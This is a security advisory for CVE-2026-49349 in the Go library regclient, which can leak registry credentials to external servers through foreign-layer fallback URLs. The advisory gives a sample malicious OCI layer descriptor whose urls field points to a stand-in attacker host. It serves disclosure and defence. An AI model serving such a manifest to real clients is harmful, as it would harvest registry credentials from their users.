PT-2026-53024 · Go · Github.Com/Regclient/Regclient

Published

2026-06-26

Updated

2026-06-26

CVE-2026-49349

CVSS v3.1

6.8

Medium

Vector

AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N

Credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs.

Example attack

A malicious registry serves an OCI image manifest containing a layer descriptor with a urls field pointing to an attacker controlled host:

json

{
 "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
 "digest": "sha256:...",
 "size": 1024,
 "urls": ["https://malicious.example.org/blobs/sha256/..."]
}

When regclient fetches the image and the primary blob request to the registry fails, it falls back to the URLs in the layer descriptor. If the external server requests authentication, regclient would send the credentials for the original registry server.

Timeline

2026-05-25: Advisory submitted
2026-05-26: Fix released

Credit

Theodoros Lampropoulos, Threat Detection Engineer, Odyssey Cyber Security

Fix

Insufficiently Protected Credentials

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-522

Related Identifiers

CVE-2026-49349

GHSA-QVQC-4C52-X6QP

Affected Products

Github.Com/Regclient/Regclient

PT-2026-53024 · Go · Github.Com/Regclient/Regclient

CVE-2026-49349

Example attack

Timeline

Credit

Weakness Enumeration

Related Identifiers

Affected Products

References · 3